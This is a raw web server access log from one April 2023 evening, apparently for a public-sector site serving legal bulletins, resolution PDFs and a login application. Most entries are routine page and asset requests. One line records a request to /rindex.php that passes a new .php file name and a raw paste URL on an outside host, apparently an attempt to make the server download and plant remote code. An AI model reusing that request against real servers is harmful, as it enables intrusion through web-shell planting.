172.22.2.4 - - [09/Apr/2023:19:06:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [09/Apr/2023:19:08:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
91.107.211.35 - - [09/Apr/2023:19:08:26 -0500] "GET /rindex.php?action=add&parameter=qzsqjacmkn.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw HTTP/1.1" 404 1134
172.22.2.4 - - [09/Apr/2023:19:07:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [09/Apr/2023:19:10:25 -0500] "HEAD / HTTP/1.1" 200 -
40.77.189.246 - - [09/Apr/2023:19:10:50 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
40.77.189.246 - - [09/Apr/2023:19:10:50 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
40.77.189.246 - - [09/Apr/2023:19:10:50 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
40.77.189.246 - - [09/Apr/2023:19:10:50 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [09/Apr/2023:19:10:50 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [09/Apr/2023:19:10:50 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [09/Apr/2023:19:10:50 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [09/Apr/2023:19:10:50 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [09/Apr/2023:19:10:50 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [09/Apr/2023:19:10:50 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [09/Apr/2023:19:10:50 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [09/Apr/2023:19:10:52 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
186.84.89.164 - - [09/Apr/2023:19:10:55 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
186.84.89.164 - - [09/Apr/2023:19:10:55 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
186.84.89.164 - - [09/Apr/2023:19:10:55 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
66.249.75.53 - - [09/Apr/2023:19:10:57 -0500] "-" 408 -
172.22.2.4 - - [09/Apr/2023:19:10:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
186.84.89.164 - - [09/Apr/2023:19:11:52 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 274667
186.84.89.164 - - [09/Apr/2023:19:11:53 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
186.84.89.164 - - [09/Apr/2023:19:11:53 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
186.84.89.164 - - [09/Apr/2023:19:12:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4123.pdf HTTP/1.1" 200 397816
201.245.192.253 - - [09/Apr/2023:19:13:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [09/Apr/2023:19:12:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [09/Apr/2023:19:13:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54798
216.245.221.92 - - [09/Apr/2023:19:15:25 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.76 - - [09/Apr/2023:19:15:30 -0500] "-" 408 -
186.155.19.209 - - [09/Apr/2023:19:16:24 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
186.155.19.209 - - [09/Apr/2023:19:16:24 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:24 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:24 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:24 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:24 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
186.155.19.209 - - [09/Apr/2023:19:16:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
186.155.19.209 - - [09/Apr/2023:19:16:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
186.155.19.209 - - [09/Apr/2023:19:16:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:27 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2225
186.155.19.209 - - [09/Apr/2023:19:16:27 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:28 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:28 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16242
186.155.19.209 - - [09/Apr/2023:19:16:29 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:29 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:29 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
186.155.19.209 - - [09/Apr/2023:19:16:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:29 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:29 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.155.19.209 - - [09/Apr/2023:19:16:29 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
186.155.19.209 - - [09/Apr/2023:19:16:30 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:30 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
186.155.19.209 - - [09/Apr/2023:19:16:32 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 9754
186.155.19.209 - - [09/Apr/2023:19:16:34 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
186.155.19.209 - - [09/Apr/2023:19:16:39 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 63744
186.155.19.209 - - [09/Apr/2023:19:16:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.19.209 - - [09/Apr/2023:19:16:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.102.10.37 - - [09/Apr/2023:19:17:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+kEBSN3xBca2eU+irTolsaU0WzCZzz4yAlRYvZeL66Xr/Eo2UDpgKFXLdhyGtAuLFTk4Z9P1Ko8k2DY5hgGyTjxzwyf99NhsY8u18WYmqeJyE2j3CuYyWrL8yfj85zG4zvmeI5qZ9ve+nd9w+m3PYgQgwxZ+LSMbFzFwOH5xp3SWRiAitcmpsmuqau37+R2U6mlEhnCS3OoMkdGY/28PuYLsKUa7nuWrXvsY3ComPAxTtXZEXdCEYoHV2knyfJoACzLSJjGlHL+A==&u=U2FsdGVkX19+xMvFY+P5Ybrxmev+tymuXtSBUoZEhBU=&y=U2FsdGVkX19QHfTp06syvLl6wgLUaPYpnLgbHl5UDoY6la1Mu8dLvTgTDgLdIzDO HTTP/1.1" 200 26
186.102.10.37 - - [09/Apr/2023:19:17:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX196HDVgL3z0PV3paTiqvTJMUQJVTZK3SSksIysXOJlAxL1yxyhNSC5XPK9kmumSDX5ptcxiv+qU5Nkfsxd2pn/N2uQOyQTp0Wh6ZwiwhKDrHqKIkUt6PgwRlO6Yfjdi9pQpnjoxwbwX2xxlMDxCxI5sRQLQEGcc70MbSO+KXJIEZ7fhJQ1r/Hd2Dt4HbiRvhPC/HIwIaAfWHyKEPZklUSGWAKuw2knKWd0ISka/An8dVzR3ADuYfTDkaRSCBWvuajhHPpn6k12aTk5iZNrtPlOL2xtuo1s83ealnrWnzzM7myQ3QUEw9dXL/dsbLEpa4zuUcsmUjfVuO5bZj3WzgUkwqLNZrqe1cBiRjR1B2sBbIPRfzP/8XtNt+gykReXU9u+PetcIWeFvnGu8OjmQQBDzRdlox+xKhdmdP1ovpaaOVDj34kRTnB0WD3srR22KGHD1sCWCwFXmeHfbZI0WgULJ6CqXw7kEonhCLRFLGwa4R/fjprTkeCC8wT8qv3m5QcRss96TFQEIB+NnTNaaFv7Fh8D+EBISSOvT+Ny67rRheB4vVUdDmTBONVS8xirsXL6AhKx+DbTxg6/js3Oe5uVs2etDTVwpLJLPyz4rJhUOJiYd23h8pNrjA5OVaLb55PhxAxWiVKU7EsgGp3r+CASaJj9T08XTFBM3AgXlVxsWClDss4MfKbzXmjdah+4e/cAmP0vv/dN0NyWswDj7AGcvQtK6Ko4LDrpGysO28AWHaRluRI6/15Hnquys3YPFx5MxfZfhiigHncEMMswF5e6QauZQKwO6g2lM13tUD2FAqCXyBACNMbT8MriKOLEby3sKJEMTfsjZUg81b6oo15DEsjZ7kDLrJ55SUyRtVsbP6rLhzLsmZE8Uau8oOgeQgHbWS5/716JIZdfO/Ky2UskiOX0a9AkfnBalNVFjOPCinazxEx8okywUxlZUNP51EvMtq1ZJbGFHGc8BuvMmitNY/YGauBdn+/hbnj4XMMdzlLfsi83JDCunYm8T9YHVtNp4OBznQvytic5Ewjt3Juq4teOmQ5BtCHaMNU87JCHn+CsN2nvYgJZuS/3royqyjGjBO9um9TzcLsNrgshY3LWhUen3V1Es5kK7TiBeusOYErqevcidDLQ6vea5dJummTLx1l6Gpm3Da5+jFNRum61J3Pdmm7EBaV8VJ6tbSlg2dznXyHMcKE0ykeM6FV/BK9Nz2hsDyHLeh7BGoXrev/+YyvJrh7C1RbEt3f4vvQyV10sNBBPbO5jFSHYlB4cM7FXkl1oawqLyChOieMC/x1wmp/s647o2N2ZKmfXygHX1c2q7dJ++U2pIm+Ft4VV1/abzpqNpQ2cIvO1VKWHra0aXiPE332bqPFo4bnEGAL7RqFOFcSWma2S/qCAQFCAHShKeFOg8LTTEo1qeKXKOl4hr9EBU3TH608HcWFkqWWI4xSgGFA2D1mMD4bsS4Sk64VotJMWgcXbyG9TD1CV3GBevGod8sPIsMZyfpfk+bLkgQ7/5g/an5vIlG0Xb3eoAUOdJf27rQKtMMw8SFcxBBiDix3j262yw9duWiP5G1QEbVeArOlWJYI255b9a/ZsUcjFC/jLDZlO4zo1czIO4F1m6PAoUpNB3CtK9oU0IQ7tlM20AwXFwqL+KLvgywGwvWWl3Jv7RvQKdFDP/5/f9RrZznLzcsQfXL1TvhUtuAIs5+1etVf9gAVypZvITz7aYVQwwogpO8ncpVCUw2DYLZwWuvSGYugO4NpTgyNIarOCGbTrpMK05S61G5QCaDbEODY8Z+X8vvcpITA==&u=U2FsdGVkX19+xMvFY+P5Ybrxmev+tymuXtSBUoZEhBU=&y=U2FsdGVkX19QHfTp06syvLl6wgLUaPYpnLgbHl5UDoY6la1Mu8dLvTgTDgLdIzDO HTTP/1.1" 200 26
186.102.10.37 - - [09/Apr/2023:19:17:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19UzizrG9Ep4dNUplaMsQEQ/8yAgdhS0//YZ0voXqpfxeHPG3WYtDA/29T7t5Tdg11r+62BqBXHmsaYc20HDQqLOzfs4mKS653vRfmD5z534FaSI/YOd8lMMGaxMtRVnBhyUSFs4spMyWRIBkesttifFjmV2VAUiak=&u=U2FsdGVkX19+xMvFY+P5Ybrxmev+tymuXtSBUoZEhBU=&y=U2FsdGVkX19QHfTp06syvLl6wgLUaPYpnLgbHl5UDoY6la1Mu8dLvTgTDgLdIzDO HTTP/1.1" 200 26
186.102.10.37 - - [09/Apr/2023:19:17:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/qLqshjCH21aH8sC+/oOzaxQg5ihs2WR6+ueQHO7D8aFGzvuCoeMXqx8Z1sT1C5PHhZB/kZLvgdSpb4kOiSvJPJUhPehhnQi54pVCb6vzNjSmTzPjeWnAHwC42dxV/+Vq+mx+XiNp4g1L8VDjnlqr9K0tnb9um+zA=&u=U2FsdGVkX19+xMvFY+P5Ybrxmev+tymuXtSBUoZEhBU=&y=U2FsdGVkX19QHfTp06syvLl6wgLUaPYpnLgbHl5UDoY6la1Mu8dLvTgTDgLdIzDO HTTP/1.1" 200 26
186.102.10.37 - - [09/Apr/2023:19:17:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/AH4HKsHgLzxI48+VPATkaLRebACAmFceci1U0iM57J62IWjOXOFvo6c+n+akRrlxm0sSPfbhUMjVVd/SelGNNS64UdIqiiQ4in1OUhMi6np8JZfMxQ6coqQhUwkVNFSVzGxTERtyB14kfQHIAXg6Gu63/eSxt8NM=&u=U2FsdGVkX19+xMvFY+P5Ybrxmev+tymuXtSBUoZEhBU=&y=U2FsdGVkX19QHfTp06syvLl6wgLUaPYpnLgbHl5UDoY6la1Mu8dLvTgTDgLdIzDO HTTP/1.1" 200 26
186.102.10.37 - - [09/Apr/2023:19:17:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/FG5X0bQATUMngp9QGjAVZH4vVxVyUSX71HoJCtw6qkPFH3z4VynMKCl7LQvTLYEXzmcw/02hGWW6eUA1RAVcOr1CfzEoAA0HGf3yGG+HgQWY8dph41JSMauq49Hf4GjumNw65ncAKbuKw8HQkj5cPisOV4HWzRLkeTDINZRuOXJT8vSycAtExWyfVaWqlUvl3zuStYjXjrg==&u=U2FsdGVkX19+xMvFY+P5Ybrxmev+tymuXtSBUoZEhBU=&y=U2FsdGVkX19QHfTp06syvLl6wgLUaPYpnLgbHl5UDoY6la1Mu8dLvTgTDgLdIzDO HTTP/1.1" 200 26
201.245.192.253 - - [09/Apr/2023:19:18:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [09/Apr/2023:19:18:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [09/Apr/2023:19:19:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43304
201.245.192.253 - - [09/Apr/2023:19:19:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43146
216.245.221.92 - - [09/Apr/2023:19:20:25 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [09/Apr/2023:19:19:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
201.245.192.253 - - [09/Apr/2023:19:23:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [09/Apr/2023:19:25:25 -0500] "HEAD / HTTP/1.1" 200 -
185.224.128.106 - - [09/Apr/2023:19:25:35 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [09/Apr/2023:19:24:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.202 - - [09/Apr/2023:19:26:11 -0500] "GET /autoliquidacion2020/Grupo%20Forestal%20-%20Silvicultura/Aplicativo.html HTTP/1.1" 200 359
172.22.2.4 - - [09/Apr/2023:19:24:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
201.245.192.253 - - [09/Apr/2023:19:28:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
31.13.103.10 - - [09/Apr/2023:19:29:31 -0500] "GET /autoridades-frenan-disposicion-de-residuos-de-construccion-cerca-al-humedal-salitre.html HTTP/1.1" 206 935
201.245.192.253 - - [09/Apr/2023:19:29:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43304
201.245.192.253 - - [09/Apr/2023:19:29:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43146
216.245.221.92 - - [09/Apr/2023:19:30:25 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [09/Apr/2023:19:29:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.95.119 - - [09/Apr/2023:19:31:52 -0500] "GET /images/incautan-animales-semana-santa-2023.jpeg HTTP/1.1" 200 36611
172.22.2.4 - - [09/Apr/2023:19:30:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
201.245.192.253 - - [09/Apr/2023:19:33:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
35.204.203.11 - - [09/Apr/2023:19:34:33 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
186.31.80.41 - - [09/Apr/2023:19:35:02 -0500] "GET / HTTP/1.1" 200 319
186.31.80.41 - - [09/Apr/2023:19:35:02 -0500] "GET /apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1018
186.31.80.41 - - [09/Apr/2023:19:35:02 -0500] "GET /apple-touch-icon-120x120.png HTTP/1.1" 404 1018
186.31.80.41 - - [09/Apr/2023:19:35:02 -0500] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 1018
186.31.80.41 - - [09/Apr/2023:19:35:02 -0500] "GET /apple-touch-icon.png HTTP/1.1" 404 1018
186.31.80.41 - - [09/Apr/2023:19:35:02 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [09/Apr/2023:19:35:25 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [09/Apr/2023:19:36:00 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
52.167.144.91 - - [09/Apr/2023:19:36:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3447.pdf HTTP/1.1" 304 -
172.22.2.4 - - [09/Apr/2023:19:34:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
185.119.81.103 - - [09/Apr/2023:19:37:19 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [09/Apr/2023:19:37:20 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [09/Apr/2023:19:35:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.194 - - [09/Apr/2023:19:37:45 -0500] "GET /BLA/resoluciones/AUTOS%202014/2115.pdf HTTP/1.1" 200 975764
201.245.192.253 - - [09/Apr/2023:19:38:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [09/Apr/2023:19:36:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
66.249.75.53 - - [09/Apr/2023:19:38:19 -0500] "-" 408 -
172.22.2.4 - - [09/Apr/2023:19:38:44 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
216.244.66.246 - - [09/Apr/2023:19:39:04 -0500] "-" 408 -
201.245.192.253 - - [09/Apr/2023:19:39:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43304
201.245.192.253 - - [09/Apr/2023:19:39:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43146
216.245.221.92 - - [09/Apr/2023:19:40:25 -0500] "HEAD / HTTP/1.1" 200 -
34.141.209.26 - - [09/Apr/2023:19:40:31 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
186.84.90.37 - - [09/Apr/2023:19:41:05 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.84.90.37 - - [09/Apr/2023:19:41:05 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
186.84.90.37 - - [09/Apr/2023:19:41:05 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.84.90.37 - - [09/Apr/2023:19:41:10 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.84.90.37 - - [09/Apr/2023:19:41:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
186.84.90.37 - - [09/Apr/2023:19:41:17 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.84.90.37 - - [09/Apr/2023:19:41:17 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
31.13.103.117 - - [09/Apr/2023:19:41:42 -0500] "GET /images/Aguanoso%20(1)%20(1).jpeg HTTP/1.1" 200 99891
34.90.63.76 - - [09/Apr/2023:19:42:15 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
186.30.73.106 - - [09/Apr/2023:19:42:18 -0500] "GET /BLA/resoluciones/AUTOS%202014/0075.pdf HTTP/1.1" 200 551796
201.245.192.253 - - [09/Apr/2023:19:43:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [09/Apr/2023:19:41:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [09/Apr/2023:19:42:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
